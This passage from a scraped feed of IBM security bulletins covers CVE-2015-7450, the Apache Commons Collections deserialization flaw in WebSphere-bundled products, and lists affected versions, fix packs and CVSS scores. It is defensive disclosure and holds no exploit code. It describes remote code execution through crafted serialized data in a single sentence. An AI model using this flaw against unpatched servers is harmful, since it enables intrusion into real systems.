\n\n## Vulnerability Details\n\nConsult the security bulletin [_Vulnerability in Apache Commons affects IBM WebSphere Application Server __(CVE-2015-7450)_](<http://www-01.ibm.com/support/docview.wss?uid=swg21970575>) for vulnerability details and information about fixes.\n\n## Affected Products and Versions\n\n**Rational RequisitePro 7.1.3.x, 7.1.4.x **\n\nThis vulnerability affects the RequisiteWeb component.\n\n## Remediation/Fixes\n\n**Affected Versions**\n\n| \n\n** Applying the fix** \n \n---|--- \n7.1.3.x \n7.1.4.x| Apply the appropriate WebSphere Application Server fix directly to your RequisiteWeb server host. No RequisiteWeb-specific steps are necessary. \n \n## Workarounds and Mitigations\n\nNone\n\n## ", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2018-06-17T05:07:46", "type": "ibm", "title": "Security Bulletin: A security vulnerability has been identified in IBM WebSphere Application Server shipped with IBM Rational RequisitePro (CVE-2015-7450)", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-7450"], "modified": "2018-06-17T05:07:46", "id": "3484930B9D1D577B443F9B6823E8F4CFC7578B80B89E16866C07AC9046A0F330", "href": 
"https://www.ibm.com/support/pages/node/272249", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-02-24T01:39:11", "description": "## Summary\n\nIBM WebSphere Application Server is shipped as a component of IBM Case Manager. Information about a security vulnerability affecting IBM WebSphere Application Server has been published in a security bulletin.\n\n## Vulnerability Details\n\nRefer to the security bulletin(s) listed in the Remediation/Fixes section.\n\n## Affected Products and Versions\n\nPrincipal Product and Versions| Affected Supporting Product and Versions \n---|--- \nIBM Case Manager 5.3CD| IBM WebSphere Application Server 9.0 \n\n## Remediation/Fixes\n\nPlease consult the security bulletin [Security Bulletin: Apache Commons Collections library in WebSphere Application Server Knowledge Center is vulnerable (CVE-2015-7450)](<https://www.ibm.com/support/pages/node/1107105> \"Security Bulletin: Apache Commons Collections library in WebSphere Application Server Knowledge Center is vulnerable \\(CVE-2015-7450\\)\" ) for vulnerability details and information about fixes.\n\n## Workarounds and Mitigations\n\nNone\n\n## ", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2019-12-20T08:47:33", "type": "ibm", "title": "Security Bulletin: A security vulnerability has been identified in IBM WebSphere Application Server shipped with IBM Case Manager (CVE-2015-7450)", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "cvssV2": 
{"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-7450"], "modified": "2019-12-20T08:47:33", "id": "C4201BA18FD219F4998B9CD1F31247B019E4B70DABFE54578652DCDBE9377D5D", "href": "https://www.ibm.com/support/pages/node/1110435", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-02-21T01:41:32", "description": "## Summary\n\nIBM WebSphere Application Server is shipped as a component of IBM Rational ClearCase. Information about a security vulnerability affecting IBM WebSphere Application Server has been published in a security bulletin.\n\n## Vulnerability Details\n\nPlease consult the security bulletin [_Vulnerability in Apache Commons affects IBM WebSphere Application Server (CVE-2015-7450)_](<http://www-01.ibm.com/support/docview.wss?uid=swg21970575>) for vulnerability details and information about fixes.\n\n## Affected Products and Versions\n\nIBM Rational ClearCase, CCRC WAN server/CM Server component. \n\n**Versions 8.0.0.x, 8.0.1.x:**\n\n \nThis vulnerability only applies to the CCRC WAN server component. \n**Versions 7.1.x.x:**\n\n \nNot affected.\n\n## Remediation/Fixes\n\nReview the security bulletin referenced above and apply the relevant fixes to your WAS installation used for ClearCase. \n \n\n\n**Affected Versions**\n\n| \n\n** Applying the fix** \n \n---|--- \n8.0.0.x \n8.0.1.x| Apply the appropriate WebSphere Application Server fix directly to your CCRC WAN server host. No ClearCase-specific steps are necessary. 
\n \n## ", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2018-07-10T08:34:12", "type": "ibm", "title": "Security Bulletin: A security vulnerability has been identified in IBM WebSphere Application Server shipped with IBM Rational ClearCase (CVE-2015-7450)", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-7450"], "modified": "2018-07-10T08:34:12", "id": "789948D6E2D3214CF6D14873F1BE91C91BC7007F1ACE3F9DD9D9CBFBB98592A9", "href": "https://www.ibm.com/support/pages/node/271515", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-02-21T01:52:07", "description": "## Summary\n\nWebSphere Application Server is shipped as a component of Identity Insight. Information about a security vulnerability affecting WebSphere Application Server has been published in a security bulletin. 
\n\n## Vulnerability Details\n\nPlease consult the security bulletin [Security Bulletin: Vulnerability in Apache Commons affects IBM WebSphere Application Server (CVE-2015-7450)](<http://www-01.ibm.com/support/docview.wss?uid=swg21970575>) for vulnerability details and information about fixes.\n\n## Affected Products and Versions\n\nIdentity Insight 8.0 & 8.1 bundling embedded WebSphere Application Server 7.0\n\n## ", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2018-06-16T13:37:14", "type": "ibm", "title": "Security Bulletin: A security vulnerability has been identified in WebSphere Application Server shipped with Identity Insight (CVE-2015-7450)", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-7450"], "modified": "2018-06-16T13:37:14", "id": "D66F1CF05D4FAEAA1D2A1BD6C942DFBCEFA7698121E07EA674D81BA77E984AF6", "href": "https://www.ibm.com/support/pages/node/271849", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-02-24T05:44:46", "description": "## Summary\n\nWebsphere Application Server is shipped with Predictive Customer Intelligence. 
Information about a security vulnerability affecting Websphere Application Server has been published in a security bulletin.\n\n## Vulnerability Details\n\nRefer to the security bulletins(s) listed in the Remediation/Fixes section\n\n## Affected Products and Versions\n\nPredictive Customer Intelligence version 1.1.2\n\n \n\n\n## Remediation/Fixes\n\n**Principal Product and Version(s)** | ** Affected Supporting Product and Version**| **Affected Supporting Product Security Bulletin ** \n---|---|--- \nPredictive Customer Intelligence 1.1.2 | Websphere Application Server 9.0.0.4| \n\n# [Security Bulletin: Apache Commons Collections library in WebSphere Application Server Knowledge Center is vulnerable (CVE-2015-7450)](<https://www.ibm.com/support/pages/node/1107105> \"Security Bulletin: Apache Commons Collections library in WebSphere Application Server Knowledge Center is vulnerable \\(CVE-2015-7450\\)\" ) \n \n## Workarounds and Mitigations\n\nNone\n\n## ", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2020-02-18T15:39:14", "type": "ibm", "title": "Security Bulletin: A Security Vulnerability has been Identified in Websphere Application Server Shipped with Predictive Customer Intelligence (CVE-2015-7450)", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": 
"NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-7450"], "modified": "2020-02-18T15:39:14", "id": "AC54A5DAFA15D91044EA9FE6159829752BCD0E35D53719860B2A80D7AB2DBBA9", "href": "https://www.ibm.com/support/pages/node/2861979", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-02-24T01:39:10", "description": "## Summary\n\nWebSphere Application Server is shipped with WebSphere Remote Server. Information about a security vulnerability affecting WebSphere Application Server has been published in a security bulletin\n\n## Vulnerability Details\n\nRefer to the security bulletins(s) listed in the Remediation/Fixes section\n\n## Affected Products and Versions\n\nAffected Product(s)| Version(s) \n---|--- \nIBM WebSphere Remote Server - Product Family| 9.0 \n \n\n\n## Remediation/Fixes\n\nRefer to the following security bulletins for vulnerability details and information about fixes addressed by WebSphere Application Server which is shipped with WebSphere Remote Server.\n\nPrincipal Product and Version(s)\n\n| \n\nAffected Supporting Product and Version\n\n| \n\nAffected Supporting Product Security Bulletin \n \n---|---|--- \n \nWebSphere Remote Server \n9.0\n\n| \n\nWebSphere Application Server 9.0\n\n| \n\n[Apache Commons Collections library in WebSphere Application Server Knowledge Center is vulnerable (CVE-2015-7450)](<https://www.ibm.com/support/pages/node/1107105>) \n \n## Workarounds and Mitigations\n\nNone\n\n## ", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2019-12-20T08:47:33", "type": 
"ibm", "title": "Security Bulletin: A security vulnerability has been identified in WebSphere Application Server shipped with WebSphere Remote Server (CVE-2015-7450)", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-7450"], "modified": "2019-12-20T08:47:33", "id": "E3BAE9A30B20D04512C7C16881BAE14D80726FD5F24F3B32C3DF1C51B000477A", "href": "https://www.ibm.com/support/pages/node/1111257", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-02-21T01:38:47", "description": "## Summary\n\nWebSphere Application Server is shipped as a component of Predictive Customer Intelligence. 
Information about a security vulnerability affecting WebSphere Application Server has been published in a security bulletin.\n\n## Vulnerability Details\n\nPlease consult the security bulletin [_Vulnerability in Apache Commons affects IBM WebSphere Application Server (CVE-2015-7450)_](<http://www-01.ibm.com/support/docview.wss?uid=swg21970575>) for vulnerability details and information about fixes.\n\n## Affected Products and Versions\n\n**Principal Product and Version(s)**\n\n| **Affected Supporting Product and Version** \n---|--- \nPredictive Customer Intelligence 1.0| WebSphere Application Server 8.5.5 ND \nPredictive Customer Intelligence 1.0.1| WebSphere Application Server 8.5.5 ND \nPredictive Customer Intelligence 1.1| WebSphere Application Server 8.5.5 ND \n \n## ", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2020-02-11T21:31:00", "type": "ibm", "title": "Security Bulletin: A security vulnerability has been identified in WebSphere Application Server shipped with Predictive Customer Intelligence (CVE-2015-7450)", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-7450"], "modified": "2020-02-11T21:31:00", "id": 
"C2589DFBD09C40CB0ED3C14A127AD44309E3A47D40C1ABCBAA157F4307C403C7", "href": "https://www.ibm.com/support/pages/node/271725", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-02-21T17:46:10", "description": "## Summary\n\nIBM WebSphere Application Server is shipped as a component of SmartCloud Cost Management and Tivoli Usage Accounting Manager. Information about a security vulnerability affecting IBM WebSphere Application Server has been published in a security bulletin. \n\n## Vulnerability Details\n\nConsult security bulletin [_Vulnerability in Apache Commons affects IBM WebSphere Application Server (CVE-2015-7450)_](<http://www-01.ibm.com/support/docview.wss?uid=swg21970575>) for vulnerability details and information about fixes.\n\n## Affected Products and Versions\n\n**Principal Product and Version(s)**\n\n| **Affected Supporting Product and Version** \n---|--- \nSmartCloud Cost Management 2.1 \nSmartCloud Cost Management 2.1.0.2 \nSmartCloud Cost Management 2.1.0.3 \nSmartCloud Cost Management 2.1.0.4| IBM WebSphere Application Server Liberty Core 8.5.5 \nTivoli Usage Accounting Manager 7.1| IBM WebSphere Application Server 6.1 \nTivoli Usage Accounting Manager 7.3 | IBM WebSphere Application Server 7.0 \n \n## ", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2018-06-17T22:32:15", "type": "ibm", "title": "Security Bulletin: A security vulnerability has been identified in IBM WebSphere Application Server shipped with SmartCloud Cost Management and Tivoli Usage Accounting Manager (CVE-2015-7450)", "bulletinFamily": "software", "cvss2": 
{"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-7450"], "modified": "2018-06-17T22:32:15", "id": "C5DC7E3B34A4B9A3DC0E8C0FAFE2DA531B9CD3D402160B1BD2722664BB8814ED", "href": "https://www.ibm.com/support/pages/node/609175", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-02-21T01:46:59", "description": "## Summary\n\nIBM WebSphere Application Server is shipped as a component of Tivoli Netcool/Impact. Information about a security vulnerability affecting IBM WebSphere Application Server has been published in a security bulletin.\n\n## Vulnerability Details\n\nPlease consult the security bulletin [**Security Bulletin: Vulnerability in Apache Commons affects IBM WebSphere Application Server (CVE-2015-7450)**](<http://www-01.ibm.com/support/docview.wss?uid=swg21970575>) for vulnerability details and information about fixes.\n\n## Affected Products and Versions\n\n_Principal Product and Version(s)_\n\n| _Affected Supporting Product and Version_ \n---|--- \nTivoli Netcool/Impact 6.1.x| WebSphere 7.0 \nTivoli Netcool/Impact 7.1.0| WebSphere Liberty Profile 8.5.5 \n \n## Remediation/Fixes\n\n_VRMF_\n\n| _Websphere release level_| _Remediation_ \n---|---|--- \n6.1.*| 7.0| Apply Interim Fix [_PI52103_](<http://www-01.ibm.com/support/docview.wss?uid=swg24041257>)[](<http://www-01.ibm.com/support/docview.wss?uid=swg24039898>)[](<http://www-01.ibm.com/support/docview.wss?uid=swg24039403>) \n\\-- OR \nApply Fix Pack 41 (7.0.0.41), or later (targeted availability 11 April 2016 *) \n \nFor instruction on how to upgrade Websphere see the 
latest 6.1.* Netcool Impact FP readme. \n \n_* Note this date is a scheduled date and does not represent a formal commitment by IBM._ \n7.1.0.0 \n7.1.0.1 \n \n7.1.0.2| 8.5.5.2 \n \n \n8.5.5.4| Move to 7.1.0-TIV-NCI-FP0003 and apply Interim Fix for PI52103. See 8556-wlp-archive-IFPI52103 in <http://www-01.ibm.com/support/docview.wss?uid=swg24041257>[](<http://www-01.ibm.com/support/docview.wss?uid=swg24041152>).[](<http://www-01.ibm.com/support/docview.wss?uid=swg24041152>) \n \n7.1.0-TIV-NCI-FP0003 is available here: \n<http://www.ibm.com/support/docview.wss?uid=swg24040149> \n7.1.0.3| 8.5.5.6| Apply Interim Fix for PI52103. See 8556-wlp-archive-IFPI52103 in <http://www-01.ibm.com/support/docview.wss?uid=swg24041257>[](<http://www-01.ibm.com/support/docview.wss?uid=swg24041152>). \n7.1.0.4 (future release)| 8.5.5.6+PI45266+PI52103| Impact 7.1.0.4 (due Q4 2015 *) will update Websphere Liberty Profile with fix for PI45266+PI52103. No further action is required to manually update WLP. \n \n_* Note this date is a scheduled date and does not represent a formal commitment by IBM._ \n(future release)| 8.5.5.8 (future release)| Plans to update Websphere Liberty Profile to version 8.5.5.8 (planned for release mid-Dec 2015*) are included for the next service release for Impact (due Q2 2016 *) \n \n_* Note this date is a scheduled date and does not represent a formal commitment by IBM._ \n \nTivoli Netcool/Impact 5.1.1 is not affected as this ships with WebSphere 6.1. 
\n\n## ", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2018-06-17T15:13:22", "type": "ibm", "title": "Security Bulletin: Vulnerability in IBM WebSphere Application Server affects Tivoli Netcool Impact (CVE-2015-7450)", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-7450"], "modified": "2018-06-17T15:13:22", "id": "F9ADD5C0B29D5EA4036B7F3A5477FA4502428CD7F7F7ABD1AF85EE16C6650D8F", "href": "https://www.ibm.com/support/pages/node/272341", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-02-21T01:47:06", "description": "## Summary\n\n \nIBM WebSphere Application Server is shipped as a component of Tivoli Business Service Manager. Information about a security vulnerability affecting IBM WebSphere Application Server has been published in a security bulletin \n\n## Vulnerability Details\n\nPlease consult the security bulletin [**Security Bulletin: Vulnerability in Apache Commons affects IBM WebSphere Application Server (CVE-2015-7450)**](<http://www-01.ibm.com/support/docview.wss?uid=swg21970575>) for vulnerability details and information about fixes.. 
\n\n## Affected Products and Versions\n\n_Principal Product and Version(s)_\n\n| _Affected Supporting Product and Version_ \n---|--- \nTivoli Business Service Manager 6.1.x| WebSphere 7.0 \n \n## Remediation/Fixes\n\n_Principal Product and Version(s)_\n\n| _Affected Supporting Product and Version_ \n---|--- \nTivoli Business Service Manager 6.1.x| WebSphere 7.0 \n \nApply Interim Fix [_PI52103_](<http://www-01.ibm.com/support/docview.wss?uid=swg24041257>)[](<http://www-01.ibm.com/support/docview.wss?uid=swg24039898>)[](<http://www-01.ibm.com/support/docview.wss?uid=swg24039403>) \n\\-- OR \nApply Fix Pack 41 (7.0.0.41), or later (targeted availability 11 April 2016 *) \n \nFor instruction on how to upgrade Websphere see the latest 6.1.* Tivoli Business Service Manager FP readme. \n \n_* Note this date is a scheduled date and does not represent a formal commitment by IBM._ \n \n## ", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2018-06-17T15:13:22", "type": "ibm", "title": "Security Bulletin: Vulnerability in IBM WebSphere Application Server affects Tivoli Business Service Manager (CVE-2015-7450)", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": 
["CVE-2015-7450"], "modified": "2018-06-17T15:13:22", "id": "182B7E2B619361F12F4ED5FC874487EFED77E355247E741885559BD37BCBA877", "href": "https://www.ibm.com/support/pages/node/272345", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-02-21T01:39:10", "description": "## Summary\n\nAn Apache Commons Collections vulnerability for handling Java object deserialization was addressed by IBM Sterling B2B Integrator.\n\n## Vulnerability Details\n\n**CVE ID:** [_CVE-2015-7450_](<https://vulners.com/cve/CVE-2015-7450>) \n**DESCRIPTION:** Apache Commons Collections could allow a remote attacker to execute arbitrary code on the system, caused by the deserialization of data with Java InvokerTransformer class. By sending specially crafted data, an attacker could exploit this vulnerability to execute arbitrary Java code on the system. \nCVSS Base Score: 9.8 \nCVSS Temporal Score: See [_https://exchange.xforce.ibmcloud.com/vulnerabilities/107918_](<https://exchange.xforce.ibmcloud.com/vulnerabilities/107918>) for the current score \nCVSS Environmental Score*: Undefined \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H)\n\n## Affected Products and Versions\n\nIBM Sterling B2B Integrator 5.2 \n\nSterling Integrator 5.1\n\n## Remediation/Fixes\n\n**Product**\n\n| \n\n**Version**\n\n| \n\n**APAR**\n\n| \n\n**Remediated Fix** \n \n---|---|---|--- \nSterling Integrator | 5.1| IT12208| Apply Generic Interim Fix 5010004_9 available on [_IWM_](<https://www14.software.ibm.com/webapp/iwm/web/preLogin.do?source=swg-SterlngLegacyreq>) \nIBM Sterling B2B Integrator| 5.2.0.0-5.2.5.0| IT12208| \n\n 1. Upgrade IBM Sterling B2B Integrator to 5.2.5.0.\n 2. 
Apply Generic Interim Fix 5020500_10 available on [_Fix Central_](<http://www-933.ibm.com/support/fixcentral/swg/selectFixes?parent=ibm~Other%2Bsoftware&product=ibm/Other+software/Sterling+B2B+Integrator&release=5.2.5.0&platform=All&function=all>) \nNote: If you cannot upgrade the Sterling B2B Integrator to 5020500_10, you may follow the instructions for Sterling Integrator 5.1 \nIBM Sterling B2B Integrator| 5.2.6.0| IT12208| \n\n 1. Apply Fix Pack 5020601 available on [_Fix Central_](<http://www-933.ibm.com/support/fixcentral/swg/selectFixes?parent=ibm~Other%2Bsoftware&product=ibm/Other+software/Sterling+B2B+Integrator&release=All&platform=All&function=all>) \n \n**If you use IBM Global Mailbox, do the following additional steps \n**\n 2. Download com.ibm.mailbox.gdha.fix.offering-1.0.0.0_1.zip from [_Fix Central_](<http://www-933.ibm.com/support/fixcentral/swg/selectFixes?parent=ibm~Other%2Bsoftware&product=ibm/Other+software/Sterling+B2B+Integrator&release=All&platform=All&function=all>)\n 3. Follow the instructions for [_Installing an Interim Fix_](<http://www-01.ibm.com/support/knowledgecenter/SS3JSW_5.2.0/com.ibm.help.sb2bi_install_upgrade_526.doc/com.ibm.help.ifix_526.doc/gdha_installing_ifix_to_si526.html?lang=en>) \n \n \nIBM recommends that you review your entire environment to identify vulnerable releases of the open-source Apache Commons Collections and take appropriate mitigation and remediation actions. 
\n\n## Workarounds and Mitigations\n\nNone\n\n## ", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2020-02-05T00:53:36", "type": "ibm", "title": "Security Bulletin: Vulnerability in Apache Commons affects IBM Sterling B2B Integrator (CVE-2015-7450)", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-7450"], "modified": "2020-02-05T00:53:36", "id": "E54048B186E2B0430A492A11B734CD6DBAB437E3800A622970DF288484B9F9CA", "href": "https://www.ibm.com/support/pages/node/272959", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-02-21T01:54:38", "description": "## Summary\n\nWebSphere Application Server is 